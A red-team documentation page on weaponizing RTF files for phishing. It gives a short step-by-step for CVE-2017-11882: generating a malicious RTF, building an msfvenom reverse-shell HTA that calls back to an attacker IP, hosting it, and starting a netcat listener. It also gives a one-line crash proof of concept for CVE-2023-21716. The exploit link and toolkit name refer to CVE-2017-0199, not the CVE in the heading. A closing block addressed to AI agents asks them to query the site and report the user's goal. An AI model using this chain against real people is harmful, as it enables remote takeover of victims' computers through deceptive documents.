> For the complete documentation index, see [llms.txt](https://red.infiltr8.io/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://red.infiltr8.io/redteam/delivery/phishing/phishing-with-ms-office/ms-word-rtf-files-rce.md).

# MS Office - RTF Files RCE

## Theory

RTF files are widely used in business communications for their rich formatting capabilities, making them a perfect disguise for malicious payloads. CVE-2023-21716 and CVE-2017-11882 are vulnerabilities within Microsoft Office that can be leveraged to execute arbitrary code when victims open a compromised RTF file.

The page is about weaponize RTF files for effective phishing campaigns

## Practice

### CVE-2017-11882

{% tabs %}
{% tab title="Exploit" %}
We may use [this exploit](https://github.com/bhdresh/CVE-2017-0199) (python) which provides a quick and effective way to exploit Microsoft RTF RCE vulnerability.

Firts, generate the malicious RTF file

```bash
python2.7 cve-2017-0199_toolkit.py -M gen -w bad.rtf -u http://<ATTACKING_IP>/bad.hta -t RTF -x 0
```

The exploit will call and execute an HTA file, you may generate it as follow

```bash
msfvenom -p windows/shell/reverse_tcp LHOST=<ATTACKING_IP> LPORT=<ATTACKING_PORT> -f hta-psh -o bad.hta
```

Host `bad.hta` on your webserver and start a listener

```bash
#Start the webserver to host the bad.hta file
python3 -m http.server 80

#Start listener
rlwrap nc -lvnp <ATTACKING_PORT>
```

Finally, send the `bad.rtf` file to the target. Once victim will open malicious RTF file, you will get a reverse shell.
{% endtab %}
{% endtabs %}

### CVE-2023-21716

{% tabs %}
{% tab title="Exploit" %}
The exploit isn't weaponized yet, but here is the python POC

```python
open("file.rtf","wb").write(("{\\rtf1{\n{\\fonttbl" + "".join([ ("{\\f%dA;}\n" % i) for i in range(0,32761) ]) + "}\n{\\rtlch no crash??}\n}}\n").encode('utf-8'))
```

{% endtab %}
{% endtabs %}


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://red.infiltr8.io/redteam/delivery/phishing/phishing-with-ms-office/ms-word-rtf-files-rce.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.